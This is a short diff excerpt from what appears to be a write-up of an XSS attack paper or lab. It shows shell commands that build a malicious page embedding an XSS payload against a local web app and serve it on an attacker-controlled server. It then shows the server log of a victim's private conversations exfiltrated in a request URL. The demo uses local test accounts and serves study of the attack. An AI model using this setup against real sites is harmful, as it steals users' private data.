centime/xss-paper/attacks.md

     echo "<iframe src='http://localhost:8080/xss/$(cat payloads/read-private.b64)'></iframe>" > malicious-website/read-private.html
     cd malicious-website && python3 -m http.server 1337

-When someone visits localhost:1337/read-private.html :
+When someone (test2 in my case) visits localhost:1337/read-private.html, after a short while our malicious server receives another request :

     "GET /%5B%0A%20%20%7B%0A%20%20%20%20%22author%22%3A%20%22test1%22%2C%0A%20%20%20%20%22title%22%3A%20%22%20Private%20conversation%20is%20private%20%22%2C%0A%20%20%20%20%22content%22%3A%20%22%20Or%20is%20it%20%3F%20%22%0A%20%20%7D%2C%0A%20%20%7B%0A%20%20%20%20%22author%22%3A%20%22test3%22%2C%0A%20%20%20%20%22title%22%3A%20%22%20Another%20%22%2C%0A%20%20%20%20%22content%22%3A%20%22%20%E2%80%9Cprivate%E2%80%9D%20conversation%20%22%0A%20%20%7D%2C%0A%20%20%7B%0A%20%20%20%20%22author%22%3A%20%22test3%22%2C%0A%20%20%20%20%22title%22%3A%20%22%20last%20%22%2C%0A%20%20%20%20%22content%22%3A%20%22%20of%20thoses%20%22%0A%20%20%7D%0A%5D HTTP/1.1" 404 -